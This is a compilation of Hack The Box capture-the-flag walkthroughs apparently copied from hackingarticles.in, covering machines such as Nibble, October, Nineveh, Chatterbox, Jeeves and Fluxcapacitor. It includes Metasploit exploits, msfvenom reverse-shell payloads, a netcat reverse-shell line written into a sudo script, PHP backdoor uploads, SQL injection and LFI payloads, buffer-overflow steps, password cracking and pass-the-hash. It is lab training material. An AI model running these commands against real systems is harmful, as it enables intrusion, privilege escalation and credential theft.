Wednesday, January 2, 2019 7:15 PM

Level: Easy
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online accessible therefore they have static IP. The IP of Nibble
is 10.10.10.75 so let’s initiate with nmap port enumeration.
1 nmap -A 10.10.10.75
As you can see in the given screenshot that we have two services running on our
Target Machine, ssh and HTTP on ports 22 and 80 respectively.

The Port 80 is open so let’s open IP in out Browser to see that if a website is hosted on
the IP. After opening the IP in the browser, we were greeted by following page.

Then we use curl to send http request on http://10.10.10.75 and notice /nibbleblog/
which could be any web directory.

Walkthroughs 3 Page 88
So we execute the http://10.10.10.75/nibbleblog/ directory put us on the main page of a
blogging platform NibbleBlog Yum yum. Without wasting time search for the exploit in
the Google and Rapid 7 link for its exploitation.

Walkthroughs 3 Page 89
the Google and Rapid 7 link for its exploitation.

So we load metasploit framework and executed following command to take meterpreter

session of victim’s VM.
According to this module Nibbleblog contains a flaw that allows an authenticated remote
attacker to execute arbitrary PHP code. This module was tested on version 4.0.3.
1 use exploit/multi/http/nibbleblog_file_upload
2 msf exploit(multi/http/nibbleblog_file_upload) > set rhost 10.10.10.75
3 msf exploit(multi/http/nibbleblog_file_upload) > set username admin
4 msf exploit(multi/http/nibbleblog_file_upload) > set password nibbles
5 msf exploit(multi/http/nibbleblog_file_upload) > set targeturi /nibbleblog
6 msf exploit(multi/http/nibbleblog_file_upload) > exploit
From given below image you can observe meterpreter session1 opened for accessing
victim tty shell.
Now let’s finish the task by grabbing user.txt and root.txt file. First I move into /home
directory and check available files and directories inside it. I found the 1 st flag “user.txt”
from inside /home/nibbler.
1 cd /home
2 cd /nibbler
3 cat user.txt

Walkthroughs 3 Page 90
For spawning proper tty shell of target’s system we need to import python file, therefore,
I run following command inside meterpreter shell.
1 shell
2 python3 -c 'import pty;pty.spawn("/bin/bash")'
3 ls
Inside /nibbler there was a zip file so we try to unzip it with help of following command
and after extracting zip file we got a directory “personal”, so we get inside it, then with a
little more efforts found a script monitor.sh.
1 unzip personal.zip
2 cd personal
3 ls
4 cd stuff
5 ls -al

Walkthroughs 3 Page 91
Then I check sudo rights for user “nibbler” and notice nibbler has sudo permission for
script monitor.sh which means he can modify this script

So in a new terminal we generated a payload for netcat shell with help of msfvenom
command as shown and copied the highlighted code and start necat listener too.
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.25 lport=5555 R
nc -lvp 5555

Then to it exploit it we move inside following Path: /home/nibbler/personal/stuff/ and

paste above copied code inside monitor.sh as shown below
1 cd /home/nibbler/personal/stuff/
2 echo "mkfifo /tmp/jswwrii; nc 10.10.14.25 5555 0</tmp/jswwrii | /bin/sh >/tmp/jswwrii 2>&1;

Walkthroughs 3 Page 92
2 echo "mkfifo /tmp/jswwrii; nc 10.10.14.25 5555 0</tmp/jswwrii | /bin/sh >/tmp/jswwrii 2>&1;
rm /tmp/jswwrii" > monitor.sh
Since we knew monitor.sh has full permission, so we can run it to obtain reverse shell
along root access.

On other we have netcat listener, which has provided root access to us. Let’s finish this
task and grab the root.txt file………………………………..
1 id
2 cd /root
3 ls
4 root.txt
5 cat root.txt

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an

Information Security Consultant Social

From <https://www.hackingarticles.in/hack-the-box-challenge-nibble-walkthrough/>

Walkthroughs 3 Page 93
October
Wednesday, January 2, 2019 7:15 PM

Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense
is 10.10.10.16 so let’s begin with nmap port enumeration.
1 nmap -sV 10.10.10.16
From given below image, you can observe we found port 22 and 80 are open on target
system.

As port 80 is running http server we open the target machine’s ip address in our
browser, and find that it is running octobercms.

We go to the default admin login page for octobercms at

http://10.10.10.16/backend/backend/auth/signin.

Walkthroughs 3 Page 94
We can login to this CMS with default credentials; Username: admin Password:
admin

And we got the admin access to October CMS, Now to get reverse shell first rename

Walkthroughs 3 Page 95
And we got the admin access to October CMS, Now to get reverse shell first rename
your php payload to ‘.php5 ‘. We use msfvenom to create a php payload and save it as
shell.php5.
1 msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw >
shell.php5

After create the payload we setup our listener using metasploit.

1 msf > use exploit/multi/handler
2 msf > exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
3 msf > exploit(multi/handler) > set lhost 10.10.14.25
4 msf > exploit(multi/handler) > set lport 4444
5 msf > exploit(multi/handler) > run

Now click on Media in the top toolbar, now upload your PHP reverse shell, and click on
the public link which is on the right side.

Walkthroughs 3 Page 96
the public link which is on the right side.

As soon as we click on the link we get our revershell. We use sysinfo command to
check the system information about the target machine.

Now spawn a tty shell and try to find binaries in the system with suid bit set.
1 meterpreter > shell
2 python -c "import pty;pty.spawn('/bin/bash')"
3 find / -perm -4000 2>/dev/null

Walkthroughs 3 Page 97
We find a binary called ovrflw that has suid bit set. We download the file into our system
using meterpreter.
1 meterpreter > download /usr/local/bin/ovrflw /root/Desktop

We open the file in gdb and take a look at the assembly code. At line main+64 we find
the strcpy function, As strcpy is vulnerable to buffer overflow we try to exploit it.

Walkthroughs 3 Page 98
First we create a 150 bytes long string to find the EIP offset using patter_create script.
1 ./pattern_create.rb -l 150

We run the file in gdb along with the 150 byte character as the argument and find that
the EIP register was overwritten with 0x64413764.

We pass that into /usr/share/metasploit-framework/tools/pattern_offset.rb, we get an

offset of 112. So we need to write 112 characters and then write the address of the
instructions we want to be executed.
1 ./pattern_offset.rb -q 64413764 -l 150

Walkthroughs 3 Page 99
Now when we try to insert shellcode into the buffer but we were unable to execute it
because of DEP. It prevents code from being executed in the stack. Now we are going
to do a ret2libc attack to execute a process already present in the process’ executable
memory. We go into the target machine and find ASLR in enabled so we have to brute
force the address. Now we find the address of system, exit and /bin/sh.
1 gdb /usr/local/bin/ovrflw -q
2 (gdb) b main
3 (gdb) run
4 (gdb) p system
5 (gdb) find 0xb75bd310, +9999999, "/bin/sh"
6 (gdb) x/s 0xb76dfbac
7 (gdb) p exit

Now we create our exploit we brute force the address using bash because of ASLR. We
align the address in this order: system>exit>/bin/sh. We get the root shell as soon as it
matches our memory address.

Walkthroughs 3 Page 100

After getting the root shell, we move to /root directory and find a file called root.txt we
open the file and find the first flag.

After finding the first flag we go to /home/ directory, in home directory and find a
directory called harry/. We go inside harry directory and find a file called user.txt, we
open user.txt and find our final flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security
enthusiast. Contact Here
Share this:

From <https://www.hackingarticles.in/hack-the-box-october-walkthrough/>

Walkthroughs 3 Page 101

Nineveh
Wednesday, January 2, 2019 7:15 PM

Level: Intermidate
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online accessible therefore they have static IP. The IP of Nineveh
is 10.10.10.43 so let’s initiate with nmap port enumeration.
1 nmap -A 10.10.10.43
it enumerated port 80 and 443 are open.

We explored port 80 but didn’t observe any remarkable clue for next step.

So next, we use the dirb tool of kali to enumerate the directories and found some
important directories such as http://10.10.10.43/department/ then went to the web

Walkthroughs 3 Page 102

important directories such as http://10.10.10.43/department/ then went to the web
browser to explore them.
1 dirb http://10.10.10.43 /usr/share/wordlist/dirb/big.txt

It put-up login page as shown here.

So we try the random combination of username and password. While we have enter
username: admin and Password: password it gave an error “Invalid Password” hence it
was sure that the username must be admin.

Walkthroughs 3 Page 103

was sure that the username must be admin.

Then with help of burp suit we made brute force attack and use rockyou.txt file as
password dictionary. Thus we obtain correct combination for login.
1 Username: admin
2 Password: 1q2w3e4r5t

Used above credential for login and get into admin console as shown.

Walkthroughs 3 Page 104

Used above credential for login and get into admin console as shown.

At Notes tab we concluded that the given text of a file stored at someplace in the
system entitled with ninevehNotes.txt.

Walkthroughs 3 Page 105

system entitled with ninevehNotes.txt.

After that we also we explored port 443 and observe the following web page. We also
look at it view source but didn’t notice any further hint.

Walkthroughs 3 Page 106

look at it view source but didn’t notice any further hint.

Therefore again use dirb tool for directory brute force attack and observe the /db
directory.
1 dirb https://10.10.10.43 /usr/share/wordlist/dirb/big.txt

For a second time we explored above enumerated directory and observe login page for
phplightAdmin v1.9.

Walkthroughs 3 Page 107

Again we lunch brute forced the password field on /db with burp suit and got the
password: password123.

By using password123 and we get inside the PHP LiteAdmin dashboard. Then with
help of Google we found the trick to exploit it after reading description from exploit DB
24044.

Walkthroughs 3 Page 108

24044.

After reading the description from exploit 24044 then we create a new database
“ninevehNotes.txt.shell.php”

Here we have created a new table “Demo” and Add! Filed inside this.

Walkthroughs 3 Page 109

Now create entry in filed 1 as shown.

Let’s create a PHP payload for injecting inside new database. We have use msfvenom
command for generating PHP backdoor.
1 msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw
Now copy the code from *<?php….die(); and start multi handler in a new terminal

GO to insert tab and Past above copied code inside the text filed given for Value.

Walkthroughs 3 Page 110

At last you will notice /var/tmp/ ninevehNotes.txt.shell.php is the Path for your
database.

If you remember, we had already access admin console and observed a tab for Notes,
use it to execute your backdoor.
1 http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.txt.shell.php

Meanwhile, return to the Metasploit terminal and wait for the metepreter session by
exploiting multi handler.
1 msf use exploit/multi/handler
2 msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
3 msf exploit(multi/handler) set lhost 10.10.14.25
4 msf exploit(multi/handler) set lport 4444
5 msf exploit(multi/handler) exploit
From given below image you can observe Meterpreter session 1. But the task is not
finished yet, still, we need to penetrate more for privilege escalation.
1 meterpreter > sysinfo
2 meterpreter > cd /home
3 meterpreter > ls
4 meterpreter > cd amrois
5 meterpreter >ls
6 meterpreter > cat user.txt

Walkthroughs 3 Page 111

6 meterpreter > cat user.txt

After doing a little bit enumeration we notice a directory report is owned by the
user amrois and these reports were being continuously generated by chkrootkit in every
minute.
With help of Google we came know that metasploit contains an exploit for chkrootkit
exploitation. After enter following command as shown in given image to
load exploit/unix/local/chkrootkit module then set session 1and arbitrary lport such
as 4545 and run the module.
This will give another session, as you can see we have spawned command shell of
target’s machine. Now if you will check uid by typing id it will show uid=0 as root.
1 id
2 cd /root
And to see the list of files in /root type:
ls -lsa

Walkthroughs 3 Page 112

ls -lsa
In the list you will see that there is a text file and to read that file type :
cat root.txt
Congrats!! We hit Goal finished both task and at end obtain the root access.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an

Information Security Consultant Social Media Lover and Gadgets. Contact here
Share this:

Walkthroughs 3 Page 113

 Share this:
• Click to share on Twitter (Opens in new window)
• Click to share on Facebook (Opens in new window)
• Click to share on Google+ (Opens in new window)
Like this:

From <https://www.hackingarticles.in/hack-the-box-nineveh-walkthrough/>

Walkthroughs 3 Page 114

Sneaky
Wednesday, January 2, 2019 7:15 PM

Level: Intermediate
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is
10.10.10.20 so let’s begin with nmap port enumeration.
1 nmap -sT -sU 10.10.10.20
From given below image, you can observe we found port 80 and 161 are open on target
system.

As port 80 is running http we open it in our browser, the website shows that it’s under
construction.

We initiate dirb to enumerate the directories hosted on the target machine.

1 dirb http://10.10.10.20/

Walkthroughs 3 Page 115

We find a directory called /dev/ we open it in our browser and find a login screen.

We find the login page is vulnerable to sql injection; we use this vulnerability to bypass
the login page using query ‘or 1=1—in username and password.

Walkthroughs 3 Page 116

After logging in we find a link on the webpage.

We open the link and find a RSA private key. We download the key into our system.

Walkthroughs 3 Page 117

We open the link and find a RSA private key. We download the key into our system.

Now the target machine is not running any ssh service so that we can use this to login
through ssh.
To investigate further we enumerate SNMP protocol to gain more information.
1 msf > use auxiliary/scanner/snmp/snmp_enum
2 msf auxiliary(scanner/snmp/snmp_enum) > set rhosts 10.10.10.20
3 msf auxiliary(scanner/snmp/snmp_enum) > set threads 5
4 msf auxiliary(scanner/snmp/snmp_enum) > exploit

Walkthroughs 3 Page 118

After enumerating the target machine we find that maybe ssh is running in ipv6.

Walkthroughs 3 Page 119

We use a python script called Enyx to find the ipv6 address of the target machine. You
can get the script from this link.
1 python enyx.py 2c public 10.10.10.20

Walkthroughs 3 Page 120

After finding the ipv6 address of the target machine we login through ssh using the
username and RSA Private key that we find after we login on the /dev/ page.
1 ssh -i key thrasivoulos@dead:beef:0000:0000:0250:56ff:fe8f:d853

Walkthroughs 3 Page 121

After logging in through ssh we find a file called user.txt we open it and find our first flag.
Now we try to find files with suid bit set.
1 find / -perm -4000 2>/dev/null

We find a binary file called chal in /usr/local/bin we open it in gdb and find there is a
strcpy function.

Walkthroughs 3 Page 122

strcpy function.
(gdb) set disassembly-flavor intel
(gdb) disas main
1 pattern_create.rb -l 500

Now we try to check if we can overflow the memory through this strcpy function. First
we create a 500 byte string using the patter create script in metasploit.

We run the file in gdb and find that the return address was overwritten with the
characters in the string.

We check the size that is required to completely overwrite the return address by

Walkthroughs 3 Page 123

 We check the size that is required to completely overwrite the return address by
checking the location of the string that became the return address inside the pattern that
we created. We use pattern offset tool to check the corresponding location.
1 pattern_offset.rb -q 316d4130 -l 500

We find that after 362 bytes the return address gets overwritten. Now we take a look at
the stack to find a location for nop sled and shell code.

We picked the stack address 0xbffff510; you can change the stack pointer address and
pick the shellcode according to your need. We use python script to create our exploit
and pass the output as argument for the file. When we run the command below, we get
a tty shell as root user. We move to /root/ directory and find a file called root.txt; we
open the file and find our final flag.

uthor: Sayantan Bera is a technical writer at hacking articles and cyber security
enthusiast. Contact Here
Share this:
• Click to share on Twitter (Opens in new window)
• Click to share on Facebook (Opens in new window)
• Click to share on Google+ (Opens in new window)
Like this:

From <https://www.hackingarticles.in/hack-the-box-challenge-sneaky-walkthrough/>

Walkthroughs 3 Page 124

Chatterbox
Wednesday, January 2, 2019 7:16 PM

Level: Easy
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online accessible therefore they have static IP. The IP of
chatterbox is 10.10.10.74 so let’s initiate with nmap port enumeration.
1 nmap -p1-10000 10.10.10.74
It has shown two ports are open but didn’t disclose running services through them.

Therefore we took help from Google and asked to look for any exploit related to these
port as shown in the below image. So it put up two exploits related to Achat. First, we
tried Metasploit exploit to compromise victim’s machine and almost successfully seized
meterprerter session, but the session was getting died in few seconds.
Thus we choose the manual technique to compromise victim’s machine by using exploit
DB 36025.

Walkthroughs 3 Page 125

Exploit 36025 is already stored inside Kali Linux and we have copied it on the Desktop.
1 cd Desktop
2 cp /usr/share/exploitdb/exploits/windows/remote/36025.py .
3 cat 36025.py
According to this python script, it is exploitable to Buffer overflow and highlighted
msfvenom code is used to generate payload.

With the help of above script we execute following command to generate payload.
Then copied the generated shellcode.

Walkthroughs 3 Page 126

Then copied the generated shellcode.

Now open the original 36025.py which you have saved on the desktop and paste
above-copied shellcode here and then enter victim’s IP (10.10.10.74) as
Server_address. Now start Netcat for reverse connection before running this script.
nc -lvp 1234

Walkthroughs 3 Page 127

nc -lvp 1234

Now run your python script to lunch Buffer overflow attack on victim’s machine.
python 36025.py

BOOooOOMM!! Here we command shell of victim’s machine. Let’s finish this task by
grabbing both flags.

Inside C:\Users\Alfred\Desktop we found user.txt flag used type “filename” command

for reading this file.

Walkthroughs 3 Page 128

for reading this file.
1 cd Desktop
2 type user.txt
Great!! We got our 1st flag successfully

Inside C:\Users\Administrator\Desktop I found the root.txt file and used type

“filename” command for reading this file.
1 cd Desktop
2 type root.txt
But this file didn’t open due to less permission.

With help of following cacls command, we can observe the permission and can change
the file’s permissions where we had granted read operate to User: Alfred for the root.txt
file.
1 cacls C:\Users\Administrator\Desktop
2 cacls root.txt /g Alfred:r

Walkthroughs 3 Page 129

2 cacls root.txt /g Alfred:r
3 type root.txt
Congratulation!! 2nd Task is also completed

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an

Information Security Consultant

From <https://www.hackingarticles.in/hack-the-box-challenge-chatterbox-walkthrough/>

Walkthroughs 3 Page 130

Crimestoppers
Wednesday, January 2, 2019 7:16 PM

Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!!
These labs are only available online, therefore, they have a static IP. Crimestoppers has
IP: 10.10.10.69.
As we knew the initial stage is enumeration; therefore use nmap Aggressive scan for
gathering target’s machine and running services information.

Knowing port 80 was open on victim’s network we preferred to explore his IP in the
browser and the following image opened as shown below. Here, we can see that it has
two pages: home and upload but didn’t find anything suspicious.

Walkthroughs 3 Page 131

So next, we use the dirb tool of kali to enumerate the directories and found some
important directories such as http://10.10.10.80/?op=view and went on the web browser
to explore them.

Walkthroughs 3 Page 132

to explore them.

At upload, you can upload any comment as a Tip, in order to provide some information.
So we try to upload malicious code here but get failed each time.
If you will observe the URL http:// 10.10.10.80/?op=upload then you will realize that its
look like that LFI.

Walkthroughs 3 Page 133

look like that LFI.

But it was not easy that much to exact information by exploiting LFI with help
of ../etc/password therefore by making little bit more effort and taking help from my
previous article. We used curl command to find out the data from inside it with the help
of PHP base64-encode.
1 curl http://10.10.10.80/?op=upload =php://filter/convert.base64-encode/resource=upload
As result, it returns base64 encode text which we need to decode.

Walkthroughs 3 Page 134

As result, it returns base64 encode text which we need to decode.

To decode bsae64 encoded text follow below syntax and found a PHP script that was
pointing toward some kind of token and secretname which was a link to uploads
directory.
Syntax: echo BASE64TEXT | base64 -d

Walkthroughs 3 Page 135

After struggling a lot, finally, we successfully uploaded our php backdoor with help burp
suite. Follow given step to upload php web shell.
Open php-reverse-shell.php which is inbuilt in kali Linux from path:
/user/share/webshells/php and modify ATTACKER’s IP and save this file on the
desktop. Here we have renamed it as shell.php and compress this file.
1 zip -0 shell.zip shell.php

Walkthroughs 3 Page 136

In order to capture the request web browser, enter the information for Tips and name
then turn burp suite and click on Send Tip.

Now in order to upload the content of our php backdoor through burp select the string
“shell” for name = tip as shown below.

Walkthroughs 3 Page 137

“shell” for name = tip as shown below.

And choose php file to paste it content at the place of shell.

Walkthroughs 3 Page 138

As you can observe that we have successfully uploaded our malicious PHP content
here.

Walkthroughs 3 Page 139

Now forward the intercepted request and you will get secretname for the uploaded file
as highlighted, copy it. Then forward the request again, it will give the success.txt
message and at last forward the request one more time.

Do not forget to launch netcat for reverse connection before executing your uploaded
file.
nc -lvp 1234
Now open the browser and execute the following command that contains secretname of
the uploaded file (PHP backdoor) and you will get netcat session for reverse
connection.

Walkthroughs 3 Page 140

connection.
1 http://10.10.10.80/?
2 op=zip://uploads/10.10.14.25/e0d7a2f54d16633eb0eddfb10efed8ea5a200274%23shell
python -c 'import pty; pty.spawn("/bin/sh")'

Because we love to work with meterpreter session therefore with help of metasploit
web_delivary module we generate malicious python code as shown.
1 msf exploit(multi/script/web_delivery) > set lhost 10.10.14.25
2 msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.25
3 msf exploit(multi/script/web_delivery) > exploit

Paste copied code in netcat which will provide meterpreter session inside Metasploit
framework.

HURRAYYYY!!! We got our meterperter session, now let’s grab the user.txt file first.
Inside path: /home/dom I found user.txt file and used cat “filename” command for
reading this file.
cd home
ls

Walkthroughs 3 Page 141

ls
cd dom
ls
cat user.txt
Great!! We got our 1st flag successfully

Now we need to find root.txt file to finish this challenge and believe me it was not easy
until you won’t the hint which is hidden by the author. We try every possible method to
escalated privilege to gain the root access but it was quite different from previous one.
After penetrating more and more we found a “36jinndk.default” from inside
/home/dom/.thunderbird, which was encrypted file for Thunderbird profile, therefore, we
download it in our local system.
1 meterpreter> download 36jinndk.default /root/Desktop/36

Walkthroughs 3 Page 142

Since it was encrypted file of Thunderbird profile so with help of Google we found a
python script from this Link: https://github.com/unode/firefox_decrypt for its
decryption.
With help of the following command, we successfully found password: Gummer59
1 python firefox_decrypt.py /root/Desktop/36

We applied this password to escalated user:dom with help of the following command
and then move into crimestoppers.htb directory it looks like his mailbox directory where
we found so many files such INBOX.
1 su dome
2 Password:
3 cd /home/dom/.thunderbird/36jinndk.default/ImapMail/crimestoppers.htb

Walkthroughs 3 Page 143

First we look into INBOX for any hint for root.txt but didn’t find something related to
root.txt flag similarly we open other files but didn’t found anything.

Walkthroughs 3 Page 144

root.txt flag similarly we open other files but didn’t found anything.

At last, we open Drafts-1 and read the following line which looks like a hint of root
access.
“I don’t trust them and run rkhunter, it reported that there a rootkit installed
called:apache_modrootme backdoor” and its execution method.

Walkthroughs 3 Page 145

So we explore following the path we found the access.log.2.gz file since it was a
compressed file, therefore, it was better to copy it inside /tmp for further steps.
1 cd /var/log/apache2
2 cp access.log.2.gz/tmp
Now let’s move inside /tmp to extract the copied file inside it with the help of gunzip.
1 gunzip access.log.2.gz
2 ls
3 cat access.log.2.gz
You can observe the log for a command “FunSociety” which has been executed several
times.

Walkthroughs 3 Page 146

As per the message read from DRAFT-1 we run netcat on localhost on port 80 get root
access with help of following commands when executed.
1 nc localhost 80
2 get FunSociety
3 get FunSociety
4 id
Now let’s get the root.txt and finish this task.
1 cd /root
2 cat root.txt
BOOOOOM!!!! We hit the Goal and completed both task.J

Walkthroughs 3 Page 147

BOOOOOM!!!! We hit the Goal and completed both task.J

Author: AArti Singh

From <https://www.hackingarticles.in/hack-the-box-challenge-crimestoppers-walkthrough/>

Walkthroughs 3 Page 148

Jeeves
Wednesday, January 2, 2019 7:16 PM

Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!!
As these labs are only available online, therefore, they have a static IP. Jeeves Lab has
IP: 10.10.10.63.
Now, as always let’s begin our hacking with the port enumeration.
1 nmap -A 10.10.10.63
Looking around its result we found ports 22, 80, 135, 445 and 50000 are open, and
moreover, port 135 and 445 was pointing towards Windows operating system.

Walkthroughs 3 Page 149

Subsequently, first we checked web service and explored target IP in a web browser
and it was put up by “Ask Jeeves search engine” webpage. So we try to search some
website such as google.com and a new web page represented by the fake error page
come up in front of us.

Walkthroughs 3 Page 150

come up in front of us.

On port 50000 in a Web browser give us to HTTP 404 Error page.

Then we decide to use OWASP Dirbuster for directory brute force attack.

Walkthroughs 3 Page 151

Then we decide to use OWASP Dirbuster for directory brute force attack.

From its result, we found so many directories but we drive with /askjeeves for further
process.

So when we had explored 10.10.10.63:50000/askjeeves it lead us to “Jenkins

Dashboard”. Ahhh!! It was WOW moment for us because we knew that there are so
many methods to exploit Jenkins. Thus we move inside “Manage Jenkins” options as it
was the spine and abusing it was quite soothing.

Walkthroughs 3 Page 152

was the spine and abusing it was quite soothing.

There were so many options but we were interested in Script Console because
Jenkins has very nice Groovy script console that allows someone to execute arbitrary
Groovy scripts within the Jenkins master runtime.

Walkthroughs 3 Page 153

Groovy scripts within the Jenkins master runtime.

We found Java reverse shell from GitHub, so we copied the code and modified its
localhost and port as per our specification.

Walkthroughs 3 Page 154

Then we start Netcat listener and run above Groovy Script to access victim’s reverse
connection. From below image, you can observe that we access tty shell of victim’s
machine.

As we love meterpreter shell therefore we load metasploit framework and execute

below commands.
1 use exploit/multi/script/web_delivery
2 msf exploit(multi/script/web_delivery) > set target 2
3 msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
4 msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28
5 msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28
6 msf exploit(multi/script/web_delivery) > exploit
Copy the highlighted text for powershell.exe and Paste it inside CMD shell as shown in
next image.

Walkthroughs 3 Page 155

Paste above malicious code here in netcat.

You will get meterpreter session of victim’s machine in your Metasploit framework and
after then finished the task by grabbing user.txt and root.txt file. Further type following:
getuid
But currently we don’t have NT AUTHORITY\SYSTEM permission. But we knew the
techniques that we have used in Tally CTF for gaining NT AUTHORITY\SYSTEM
permission.

Walkthroughs 3 Page 156

permission.

Therefore taking help from our previous article “Tally” we executed below commands
and successfully gained NT AUTHORITY\SYSTEM permission
1 upload /root/Desktop/RottenPotato/rottenpotato.exe .
2 load incognito
3 execute -Hc -f rottenpotato.exe
4 impersonate_token "NT AUTHORITY\\SYSTEM"
5 getuid

Let me tell you this, that we have solved so many CTF challenges of Hack the Box
among them some was framed using Windows Operating system and we always

Walkthroughs 3 Page 157

among them some was framed using Windows Operating system and we always
grabbed the user.txt file from inside some a folder that owned by any username and
root.txt form inside Administrator folder and both these folders are present inside C:
\Users
Similarly, you can observe the same thing here also and might be you got my intention
of above said words. So let’s grab user.txt file first from inside /kohsuke/Desktop.
COOL!!! We have captured the 1st flag.

Then we go for root.txt file, BUT it was a little bit tricky to get the root.txt file. Because
the author has hide root.txt file by using some ADS technique (Windows Alternate Data
Streams) and to grab that file, you can execute below commands.
1 cd Administrator
2 cd Desktop
3 ls-al
4 cat hm.txt
5 dir /R
6 more < hm.txt:root.txt

Walkthroughs 3 Page 158

Hurray!! R flag with dir command discloses root.txt file and We successfully completed
the 2nd task.

2nd Method
When you have fresh meterpreter session 1 then move into /document directory and
download CEH.kdbx file. Here also we took help from our previous article TALLY.

Walkthroughs 3 Page 159

Now run the python script that extracts a HashCat/john crackable hash from KeePass
1.x/2.X databases.
1 python keepass2john.py CEH.kdbx > passkey
Next, we have used John the ripper for decrypting the content of “passkey” with help of
the following command.
1 john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt passkey
so we found the master key “moonshine1” for keepass2 which is an application used for
hiding passwords of your system then you need to install it (keepass2) using the
following command.
1 apt-get install keepass2 -y

After installing, run the below command and submit “moonshine1” in the field of the
master key.
1 keepass2 tim.kdbx

Walkthroughs 3 Page 160

Inside CEH we found so many credential, we copied all password from here and past
into a text file and got few password and one NTLM hash
value: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

1 use exploit/windows/smb/psexec
2 msf exploit(windows/smb/psexec) > set rhost 10.10.10.63
3 msf exploit(windows/smb/psexec) > set smbuser administrator
4 msf exploit(windows/smb/psexec) > set smbpass
5 aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
6 msf exploit(windows/smb/psexec) > set lport 8888

Walkthroughs 3 Page 161

6 msf exploit(windows/smb/psexec) > set lport 8888
msf exploit(windows/smb/psexec) > exploit
Awesome!!! We have meterpreter session 2 with proper NT AUTHORITY\SYSTEM
permission, now use above steps to get the root.txt file.
Note: we have rebooted the target’s VM before starting 2nd method.

At the time when you have fresh meterpreter session2 (via psexec) then execute the
following command to enable remote desktop service in victim’s machine.
1 run getgui -e
2 shell
Now we have victim’s command prompt with administrator privilege thus we can change
User administrator password directly by using net user command.
net user administrator 123

Walkthroughs 3 Page 162

net user administrator 123

Now open a new terminal in your Kali Linux and type rdesktop 10.10.10.63 command
to access remote desktop services of victim’s machine and after that submit
credential administrator: 123 for login.
BOOOOOM!!! Look at the screen of our victim, now let’s grab the root flag and enjoy
this GUI mode.

Walkthroughs 3 Page 163

Finding user.txt is quite easy you can try by your own. To grab root.txt flag open the
CMD prompt and type following command ad done above.
1 dir /R
2 more < hm.txt:root.txt
Enjoy Hacking!!!!

Walkthroughs 3 Page 164

Author: AA

From <https://www.hackingarticles.in/hack-the-box-challenge-jeeves-walkthrough/>

Walkthroughs 3 Page 165

Fluxcapitor
Wednesday, January 2, 2019 7:16 PM

Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!!
These labs are only available online, therefore, they have a static IP. Fluxcapacitor has
IP: 10.10.10.69.
As we knew the initial stage is enumeration; therefore use nmap version scan for
gathering target’s machine and running services information.
1 nmap -sV 10.10.10.69

So from its scanning result, it told us that port 80 is open for web services and also
protected by web application firewall “superWAF” thus we explored target IP in the web
browser but found nothing interesting.

Then we look into its source code and saw an exciting comment which was pointing
towards URL: /sync, and without wasting time we open /sync in URL.

Walkthroughs 3 Page 166

towards URL: /sync, and without wasting time we open /sync in URL.

LOL!!! It gave 403 forbidden error message and something openresty/1.13.6.1 then we
looked into Google for any exploit related to this but failed to find any working exploit
against it.

At the moment, we decided to use burp suite for intercepting our browser request. So
after intercepting the Http request, the raw information is sent to the repeater.

Walkthroughs 3 Page 167

Huhhhh!! It was responding same output as was in the web browser. Might be there
would be some chances of WAF filter restriction on User-Agent such as Mozilla
Firefox/5.0.

So we start scrutiny for User-Agent field by replacing original user-agent content from
“raj” randomly. Finally!!! It gave current timestamp as disclosed in the comment found in
the source code of the home page.

Walkthroughs 3 Page 168

the source code of the home page.

Now it was confirmed that there was SuperWAF filter against the user-agent field,
therefore, we try to search its exploit in Google but we didn’t find any particular
exploit. Nevertheless, Google gave a little hint for OS command injection and on the
bases of that, we try few parameters within Http Header such as /sync?test=lswhich
response with the same timestamp every time. Hence we need to fuzz proper directory,
therefore, we will use wfuzz in our next step.

So we use common.txt wordlist for URL brute force and execute below command.
1 wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.69/sync?FUZZ=ls -c --hh
19
It gave 403 response for payload “opt”; let’s try to opt after/sync and identify the
response.

Walkthroughs 3 Page 169

response.

Now use ‘opt’ parameter to bypass WAF and execute ls command through it,
HOWEVER again there is a trick to execute ls command. Because WAF will not allow
you to perform OS command injection directly, therefore, it will be a little bit tougher to
exploit it. But THANKS to medium.com, because I got the idea to bypass WAF for
exploiting OS command injection which is known as string literal concatenation from
this website, means that adjacent string literals are concatenated, without any operator.

We took help from that website which I have mentioned above and execute three
commands: whoami, id, uname through curl as shown in image.
1 curl "http://10.10.10.69/sync?opt=' whoami' "
